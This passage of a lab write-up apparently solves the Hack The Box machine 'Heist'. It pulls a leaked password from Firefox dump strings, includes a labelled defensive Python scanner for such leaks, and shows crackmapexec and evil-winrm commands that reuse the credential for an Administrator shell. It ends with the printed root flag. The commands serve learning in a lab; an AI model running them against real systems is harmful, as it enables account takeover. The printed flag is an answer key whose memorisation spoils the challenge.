chrome/pippki/content/pippki/changepassword.xhtmlPK
chrome/pippki/content/pippki/resetpassword.jsPK
chrome/pippki/content/pippki/resetpassword.xhtmlPK
chrome/pippki/content/pippki/setp12password.jsPK
chrome/pippki/content/pippki/setp12password.xhtmlPK
chrome/en-US/locale/en-US/passwordmgr/passwordmgr.propertiesPK
pref("security.ask_for_password",        0);
pref("security.password_lifetime",       30);
pref("signon.recipes.path",                 "chrome://passwordmgr/content/recipes.json");
// This temporarily prevents the master password to reprompt for autocomplete.
pref("urlclassifier.passwordAllowTable", "goog-passwordwhite-proto");
pref("urlclassifier.disallow_completions", "goog-downloadwhite-digest256,base-track-digest256,mozstd-trackwhite-digest256,content-track-digest256,mozplugin-block-digest256,mozplugin2-block-digest256,block-flash-digest256,except-flash-digest256,allow-flashallow-digest256,except-flashallow-digest256,block-flashsubdoc-digest256,except-flashsubdoc-digest256,goog-passwordwhite-proto,ads-track-digest256,social-track-digest256,analytics-track-digest256,base-fingerprinting-track-digest256,content-fingerprinting-track-digest256,base-cryptomining-track-digest256,content-cryptomining-track-digest256,fanboyannoyance-ads-digest256,fanboysocial-ads-digest256,easylist-ads-digest256,easyprivacy-ads-digest256,adguard-ads-digest256,social-tracking-protection-digest256,social-tracking-protection-facebook-digest256,social-tracking-protection-linkedin-digest256,social-tracking-protection-twitter-digest256");
pref("browser.safebrowsing.provider.google4.lists", "goog-badbinurl-proto,goog-downloadwhite-proto,goog-phish-proto,googpub-phish-proto,goog-malware-proto,goog-unwanted-proto,goog-harmful-proto,goog-passwordwhite-proto");
  pref("services.sync.engine.passwords", true);
  pref("services.sync.engine.passwords.validation.interval", 86400); // 24 hours in seconds
  pref("services.sync.engine.passwords.validation.percentageChance", 10);
  pref("services.sync.engine.passwords.validation.maxRecords", 1000);
content passwordmgr toolkit/content/passwordmgr/
locale passwordmgr en-US en-US/locale/en-US/passwordmgr/
EnterLoginForRealm3=%2$S is requesting your username and password. The site says: 
EnterLoginForProxy3=The proxy %2$S is requesting a username and password. The site says: 
EnterUserPasswordFor2=%1$S is requesting your username and password.
EnterUserPasswordForCrossOrigin2=%1$S is requesting your username and password. WARNING: Your password will not be sent to the website you are currently visiting!
EnterPasswordFor=Enter password for %1$S on %2$S
input[type=password] > .anonymous-div,
input[type=password] > .preview-div {
   * In password fields, any character should be put same direction.  Otherwise,

If we look closely at the filtered "strings" output, we can see that it contains credentials:

MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=

The credentials are:

User: admin@support.htb
Password: 4dD!5}x/re8]FBuZ

This data comes from requests made by the user who had Firefox open: the login form was submitted with the credentials in the URL query string, so they ended up in the process command line and in the crash-reporter restart argument.
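As an added example (not part of this write-up), the following Python scanner does the same triage as "strings | grep password" over a dump, but parses any URL query string it finds and reports sensitive parameters with the value redacted, so a defender can check a crash dump for leaked credentials before sharing it. The sample input is constructed in the shape of the output above; the hostname and the secret value are placeholders.

```python
"""Scan `strings` output from a process or crash dump for credentials that
leaked through URL query strings (a login form submitted with GET lands in
command-line arguments, crash-reporter restart args and logs)."""
import re
from urllib.parse import parse_qsl

# Query-parameter names that normally carry secrets.
SENSITIVE_PARAM = re.compile(r"(pass|pwd|secret|token|api_?key)", re.IGNORECASE)
# Anything that looks like a query string: '?' followed by key=value pairs.
QUERY_STRING = re.compile(r"\?([^\s#\"']+=[^\s#\"']*)")

# Constructed sample modelled on the `strings | grep password` output above;
# the host and the password value are placeholders, not the ones from the dump.
SAMPLE_STRINGS = """\
security.ask_for_password
services.sync.engine.passwords.validation.interval
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@example.htb&login_password=Example-Secret-1&login=
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
pref("signon.recipes.path", "chrome://passwordmgr/content/recipes.json");
"""


def redact(value: str) -> str:
    """Keep only the length so the report can be shared without the secret."""
    return "*" * len(value)


def find_credential_leaks(strings_output: str) -> list[dict]:
    """Return one finding per sensitive, non-empty query parameter found."""
    findings = []
    for line_no, line in enumerate(strings_output.splitlines(), start=1):
        for match in QUERY_STRING.finditer(line):
            for key, value in parse_qsl(match.group(1), keep_blank_values=True):
                if value and SENSITIVE_PARAM.search(key):
                    findings.append({
                        "line": line_no,
                        "param": key,
                        "value_len": len(value),
                        "redacted": redact(value),
                        # Everything before the '?' tells us where it leaked from.
                        "source": line.split("?", 1)[0],
                    })
    return findings


if __name__ == "__main__":
    for f in find_credential_leaks(SAMPLE_STRINGS):
        print(f"line {f['line']}: {f['param']}={f['redacted']} (from {f['source']})")
```

To scan a real dump, feed it `subprocess.check_output(["strings", path], text=True)` instead of the constructed sample.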

3.2 Credential reuse

We are going to try to log in with "evil-winrm" as the "Administrator" user using the recovered password "4dD!5}x/re8]FBuZ", to test whether this is a case of credential reuse. First, though, we verify the credentials with crackmapexec:

crackmapexec winrm 10.10.10.149 -u 'Administrator' -p '4dD!5}x/re8]FBuZ'
❯ crackmapexec winrm 10.10.10.149 -u 'Administrator' -p '4dD!5}x/re8]FBuZ'
SMB         10.10.10.149    5985   SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
HTTP        10.10.10.149    5985   SUPPORTDESK      [*] http://10.10.10.149:5985/wsman
WINRM       10.10.10.149    5985   SUPPORTDESK      [+] SupportDesk\Administrator:4dD!5}x/re8]FBuZ (Pwn3d!)
User: Administrator
Password: 4dD!5}x/re8]FBuZ

We can see that the credentials are valid, so now we log in with evil-winrm:

❯ evil-winrm -i 10.10.10.149 -u 'Administrator' -p '4dD!5}x/re8]FBuZ'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

3.3 Getting the root flag

The root flag is located at "C:\Users\Administrator\Desktop\root.txt":

*Evil-WinRM* PS C:\Users\Administrator\Documents> type "C:\Users\Administrator\Desktop\root.txt"
316b1b88ab7b95b633b1e35a0115c88d
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

With this, we conclude the "Heist" machine from Hack The Box.

I hope this write-up was helpful to you :)

If you had any difficulty solving it, don't forget to contact me on my social networks.
